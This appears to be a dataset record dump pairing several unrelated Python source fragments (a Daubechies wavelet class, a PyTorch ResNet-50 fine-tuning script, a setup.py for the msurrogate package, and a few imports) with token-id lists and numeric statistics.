    def analyze(self, s):
        """Decompose signal into scaling and wavelet coefficients.

        Each branch convolves the input with the time-reversed filter (i.e.
        correlates with the filter) and then downsamples.
        """
        scaling = s.convolve(self.scaling_filter.reverse()).downsample()
        wavelet = s.convolve(self.wavelet_filter.reverse()).downsample()
        return (scaling, wavelet)
    def reconstruct(self, scaling=None, wavelet=None):
        """Reconstruct signal from scaling and wavelet coefficients.

        A missing coefficient stream defaults to the empty signal, so either
        branch can be reconstructed on its own.
        """
        if scaling is None:
            scaling = signal()
        if wavelet is None:
            wavelet = signal()
        # Upsample then filter each branch; their sum is the synthesis output.
        return scaling.upsample().convolve(
            self.scaling_filter
        ) + wavelet.upsample().convolve(self.wavelet_filter)
    def scaling_function(self, L):
        """Return scaling function at dyadic approximation 2^{-L}."""
        # Seed the cascade with a unit scaling impulse, then rescale the grid
        # (2^-L) and amplitude (2^(L/2)) to the dyadic sampling.
        s = self._cascade(L, scaling=signal([1]))
        return s.range * 2 ** -L, s.data * 2 ** (L / 2)
    def wavelet_function(self, L):
        """Return wavelet function at dyadic approximation 2^{-L}."""
        # Same as scaling_function, but seeded with a unit wavelet impulse.
        s = self._cascade(L, wavelet=signal([1]))
        return s.range * 2 ** -L, s.data * 2 ** (L / 2)
    def _cascade(self, L, wavelet=None, scaling=None):
        """
        Starting from scaling and wavelet coefficients at level L, return output of inverse wavelet transform.
        This is known as the cascade algorithm.
        """
        # there is some numerical instability in scipy's implementation of the cascade algorithm (as compared to our code
        # below and to Matlab's wavefun); otherwise we could simply use scipy.signal.cascade(self.scaling_filter.data, L)
        s = self.reconstruct(scaling=scaling, wavelet=wavelet)
        # One inverse transform consumed the seed above; L-1 more refine it.
        for l in range(L - 1):
            s = self.reconstruct(scaling=s)
        return s
# Classic Daubechies 4-tap (D4) low-pass filter coefficients.
DAUBECHIES_D4_SCALING_FILTER = signal(
    [0.482_962_913_145, 0.836_516_303_738, 0.224_143_868_042, -0.129_409_522_551]
)
# Ready-made D4 orthogonal wavelet derived from the scaling filter above.
DAUBECHIES_D4 = orthogonal_wavelet.from_scaling_filter(DAUBECHIES_D4_SCALING_FILTER)
| [
6738,
764,
12683,
282,
1330,
1635,
198,
198,
834,
439,
834,
796,
14631,
1506,
519,
20996,
62,
19204,
1616,
1600,
366,
5631,
10526,
25994,
11015,
62,
35,
19,
8973,
628,
198,
4871,
29617,
519,
20996,
62,
19204,
1616,
25,
198,
220,
220,
... | 2.517889 | 1,118 |
import numpy as np
import torch
from torch import nn
from torch import optim
import torch.nn.functional as F
from torchvision import datasets, transforms, models
from torch.utils.data.sampler import SubsetRandomSampler
# Transfer-learning script: fine-tune only the final layer of a pretrained
# ResNet-50 on images under ./data/train, with a random train/validation split.
datadir = './data/train'
valid_size = .3  # fraction of the dataset held out for evaluation
epochs = 3
steps = 0
running_loss = 0
print_every = 10  # evaluate every N optimisation steps
train_losses, test_losses = [], []
# Identical preprocessing for both splits: resize to 224 then to tensor.
train_transforms = transforms.Compose([transforms.Resize(224),transforms.ToTensor()])
test_transforms = transforms.Compose([transforms.Resize(224), transforms.ToTensor()])
# Both splits read the same folder; the samplers below keep them disjoint.
train_data = datasets.ImageFolder(datadir, transform=train_transforms)
test_data = datasets.ImageFolder(datadir, transform=test_transforms)
# Shuffle indices once, then carve off `valid_size` of them for testing.
num_train = len(train_data)
indices = list(range(num_train))
split = int(np.floor(valid_size * num_train))
np.random.shuffle(indices)
train_idx, test_idx = indices[split:], indices[:split]
train_sampler = SubsetRandomSampler(train_idx)
test_sampler = SubsetRandomSampler(test_idx)
# NOTE(review): batch_size=1 trains one image at a time -- confirm this is
# intended rather than a placeholder.
trainloader = torch.utils.data.DataLoader(train_data, sampler=train_sampler, batch_size=1)
testloader = torch.utils.data.DataLoader(test_data, sampler=test_sampler, batch_size=1)
print(trainloader.dataset.classes)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model = models.resnet50(pretrained=True)
# Freeze the pretrained backbone; only the new head below receives gradients.
for param in model.parameters():
    param.requires_grad = False
# New classification head: 2048 -> 512 -> 10, log-probabilities for NLLLoss.
model.fc = nn.Sequential(nn.Linear(2048, 512), nn.ReLU(), nn.Dropout(0.2), nn.Linear(512, 10), nn.LogSoftmax(dim=1))
criterion = nn.NLLLoss()
optimizer = optim.Adam(model.fc.parameters(), lr=0.003)
model.to(device)
for epoch in range(epochs):
    for inputs, labels in trainloader:
        steps += 1
        inputs, labels = inputs.to(device), labels.to(device)
        optimizer.zero_grad()
        logps = model.forward(inputs)
        loss = criterion(logps, labels)
        loss.backward()
        optimizer.step()
        running_loss += loss.item()
        if steps % print_every == 0:
            # NOTE(review): print_score is not defined in this chunk --
            # presumably a helper defined elsewhere in the file; verify.
            test_loss, accuracy = print_score(torch, testloader, inputs, device, model,criterion,labels)
            running_loss = 0
            model.train()
# NOTE(review): 'saftey.pth' looks like a typo for 'safety.pth', but renaming
# would change the on-disk artifact name -- left as-is.
torch.save(model, 'saftey.pth')
| [
11748,
299,
32152,
355,
45941,
198,
11748,
28034,
198,
6738,
28034,
1330,
299,
77,
198,
6738,
28034,
1330,
6436,
198,
11748,
28034,
13,
20471,
13,
45124,
355,
376,
198,
6738,
28034,
10178,
1330,
40522,
11,
31408,
11,
4981,
198,
6738,
28... | 2.609964 | 823 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
import os
import sys
from os import path
from setuptools import find_packages, setup
from distutils.command.bdist import bdist
from distutils.command.sdist import sdist
# Package version string (release candidate).
version = '0.9.0.rc1'
# Map distutils command names to custom command classes. NOTE(review): the
# check_bdist / check_sdist / check_bdist_wheel classes are not defined in
# this chunk -- presumably defined earlier in the file; confirm.
cmdclass = dict()
cmdclass['bdist'] = check_bdist
cmdclass['sdist'] = check_sdist
try:
    from wheel.bdist_wheel import bdist_wheel
except ImportError:
    pass
# NOTE(review): this assignment runs even when the `wheel` import above
# failed -- verify check_bdist_wheel does not require the wheel package.
cmdclass['bdist_wheel'] = check_bdist_wheel
if __name__ == "__main__":
    setup(
        name = 'msurrogate',
        version = version,
        url = 'https://github.com/mccullerlp/msurrogate',
        author = 'Lee McCuller',
        author_email = 'Lee.McCuller@gmail.com',
        license = 'Apache v2',
        description = (
            'Interface With an out-of-process (possibly remote) python instance from Matlab'
        ),
        packages=find_packages(
            exclude=['docs'],
        ),
        install_requires = [
            'numpy',
            'Pyro4',
        ],
        cmdclass = cmdclass,
        zip_safe = False,
        keywords = ['Matlab', 'IPC', 'Pyro4',],
        classifiers=[
            'Development Status :: 4 - Beta',
            'Intended Audience :: Developers',
            'Topic :: Scientific/Engineering',
            'License :: OSI Approved :: Apache Software License',
            'Operating System :: OS Independent',
            'Programming Language :: Python',
            'Programming Language :: Python :: 2',
            'Programming Language :: Python :: 2.7',
            'Programming Language :: Python :: 3',
            'Programming Language :: Python :: 3.4',
            'Programming Language :: Python :: 3.5',
            'Programming Language :: Python :: 3.6',
        ],
    )
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
6738,
11593,
37443,
834,
1330,
7297,
11,
3601,
62,
8818,
11,
28000,
1098,
62,
17201,
874,
198,
11748,
28686,
198,
11748... | 2.260341 | 822 |
import os
import sys
from stat import S_IREAD, S_IWRITE
from robot.api import logger
| [
11748,
28686,
198,
11748,
25064,
198,
6738,
1185,
1330,
311,
62,
40,
15675,
11,
311,
62,
40,
18564,
12709,
198,
198,
6738,
9379,
13,
15042,
1330,
49706,
628
] | 3.107143 | 28 |